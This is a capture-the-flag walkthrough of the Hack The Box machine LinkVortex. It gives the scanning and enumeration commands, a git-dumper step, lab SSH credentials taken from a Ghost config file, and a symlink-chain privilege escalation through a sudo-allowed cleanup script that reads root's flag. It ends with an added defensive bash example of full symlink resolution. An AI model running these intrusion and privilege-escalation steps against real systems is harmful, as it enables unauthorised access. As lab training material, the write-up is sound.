Hack the Box: LinkVortex Writeup

Amrit Giri

LinkVortex is a Hack The Box machine created by 0xyassine. In this walkthrough, I will demonstrate how I obtained complete ownership of this machine.

https://www.hackthebox.com/machines/LinkVortex

I have owned LinkVortex on Hack The Box:

https://www.hackthebox.com/achievement/machine/615731/638

Nmap Scanning

$ nmap -vvv -p- -T4 -oA nmap/initial 10.10.11.47

# Nmap 7.94SVN scan initiated Fri Dec 13 14:49:12 2024 as: /usr/lib/nmap/nmap --privileged -vvv -p- -T4 -oA nmap/initial 10.10.11.47
Increasing send delay for 10.10.11.47 from 0 to 5 due to 629 out of 1571 dropped probes since last increase.
Increasing send delay for 10.10.11.47 from 5 to 10 due to 75 out of 186 dropped probes since last increase.
Warning: 10.10.11.47 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.47
Host is up, received reset ttl 63 (0.65s latency).
Scanned at 2024-12-13 14:49:13 +0545 for 2713s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
# Nmap done at Fri Dec 13 15:34:26 2024 -- 1 IP address (1 host up) scanned in 2715.23 seconds

Here we can see that ports 22 and 80 are open, serving SSH and HTTP. Next, those two ports are scanned with nmap's default scripts and version detection, which results in:

$ nmap -vvv -p22,80 -sC -sV -oA nmap/ports 10.10.11.47

# Nmap 7.94SVN scan initiated Fri Dec 13 16:51:54 2024 as: /usr/lib/nmap/nmap --privileged -vvv -p22,80 -sC -sV -oA nmap/ports 10.10.11.47
Nmap scan report for linkvortex.htb (10.10.11.47)
Host is up, received echo-reply ttl 63 (0.55s latency).
Scanned at 2024-12-13 16:51:54 +0545 for 36s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMHm4UQPajtDjitK8Adg02NRYua67JghmS5m3E+yMq2gwZZJQ/3sIDezw2DVl9trh0gUedrzkqAAG1IMi17G/HA=
|   256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKLjX3ghPjmmBL2iV1RCQV9QELEU+NF06nbXTqqj4dz
80/tcp open  http    syn-ack ttl 63 Apache httpd
| http-methods:
|_  Supported Methods: POST GET HEAD OPTIONS
|_http-server-header: Apache
|_http-favicon: Unknown favicon MD5: A9C6DBDCDC3AE568F4E0DAD92149A0E3
|_http-generator: Ghost 5.58
| http-robots.txt: 4 disallowed entries
|_/ghost/ /p/ /email/ /r/
|_http-title: BitByBit Hardware
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 13 16:52:30 2024 -- 1 IP address (1 host up) scanned in 36.66 seconds

As there is a web service running, we use curl to get some initial information about the IP:

$ curl -v 10.10.11.47

This returns some HTML in which we can see the site has moved permanently to linkvortex.htb, so we now modify our hosts file so that the hostname resolves on our machine:

$ sudo nano /etc/hosts

Add the IP and its corresponding hostname in the text editor:

#.....
..
10.10.11.47    linkvortex.htb
.......
.......

Now when we open linkvortex.htb in the browser, it loads with no errors.

Enumeration

$ gobuster dir -u linkvortex.htb -w /usr/share/wordlists/dirb/common.txt
or
$ dirsearch -u http://linkvortex.htb -r
$ gobuster dns -d linkvortex.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt

git dumper

$ git-dumper http://10.10.11.47/ ./linkvortex_dumped

Find

$ grep -iR password .

By guessing, we get admin@linkvortex.htb as the email.

Using Wappalyzer we see that Ghost 5.58 is running, so we search for CVEs affecting it.

Get user flag

Searching, we find a GitHub repo written by the creator of this machine:

https://github.com/0xyassine/CVE-2023-40028

From the Dockerfile we take the path given in its cp step, /var/lib/ghost/config.production.json; that file provides us with the user and password for SSH:

username:bob@linkvortex.htb
password:fibber-talented-worth

Using the user and password, we log in to the system over SSH:

$ ssh bob@linkvortex.htb

There we cat out our user.txt flag.

Get root flag

Use the command sudo -l to check what bob is allowed to execute:

bob@linkvortex:~$ sudo -l
Matching Defaults entries for bob on linkvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty,
    env_keep+=CHECK_CONTENT

User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

/usr/bin/bash /opt/ghost/clean_symlink.sh does not require a password to execute through sudo, so we read the script:

bob@linkvortex:~$ cat /opt/ghost/clean_symlink.sh 
#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

Because sudo preserves CHECK_CONTENT (env_keep+=CHECK_CONTENT in the sudo -l output), we can set CHECK_CONTENT=true while executing the sudo command:

$ ln -s /root/root.txt flag.txt
$ ln -s /home/bob/flag.txt flag.png
$ sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh flag.png

This provides the root flag.
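For whoever maintains a script like clean_symlink.sh, the added example below (not the machine's script and not code from the original post) puts its one-hop readlink check beside a check that resolves the whole link chain and allowlists the final location. The directory tree, the file names and the allowed directory are constructed for the demonstration and live in a temporary directory.

```bash
#!/bin/bash
# Added example. All paths are constructed inside a temp dir.

# The check clean_symlink.sh performs: only the immediate link target
# is inspected, and only for the substrings "etc" or "root".
one_hop_check() (
  target=$(readlink -- "$1")
  if printf '%s\n' "$target" | grep -Eq '(etc|root)'; then
    echo blocked
  else
    echo allowed
  fi
)

# Hardened check: canonicalise the full chain, then require the final
# path to sit under an allowed directory ($2, an assumed policy).
resolved_check() (
  final=$(readlink -f -- "$1") || { echo blocked; exit 0; }
  allowed=$(readlink -f -- "$2") || { echo blocked; exit 0; }
  case "$final" in
    "$allowed"/*) echo allowed ;;
    *)            echo blocked ;;
  esac
)

# Constructed tree: flag.png -> flag.txt -> ../../root/root.txt
setup_demo() (
  tmp=$(mktemp -d)
  mkdir -p "$tmp/root" "$tmp/home/bob" "$tmp/content/images"
  echo secret > "$tmp/root/root.txt"
  echo pixels > "$tmp/content/images/real.png"
  cd "$tmp/home/bob" || exit 1
  ln -s ../../root/root.txt flag.txt
  ln -s flag.txt flag.png
  ln -s ../../content/images/real.png ok.png
  echo "$tmp"
)

d=$(setup_demo)
echo "one-hop  flag.png: $(one_hop_check "$d/home/bob/flag.png")"
echo "resolved flag.png: $(resolved_check "$d/home/bob/flag.png" "$d/content/images")"
echo "resolved ok.png:   $(resolved_check "$d/home/bob/ok.png" "$d/content/images")"
rm -rf "$d"
```

The one-hop check reports the chained link as allowed because its immediate target is just flag.txt, while the resolved check blocks it and still allows the link that ends inside the allowed directory.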
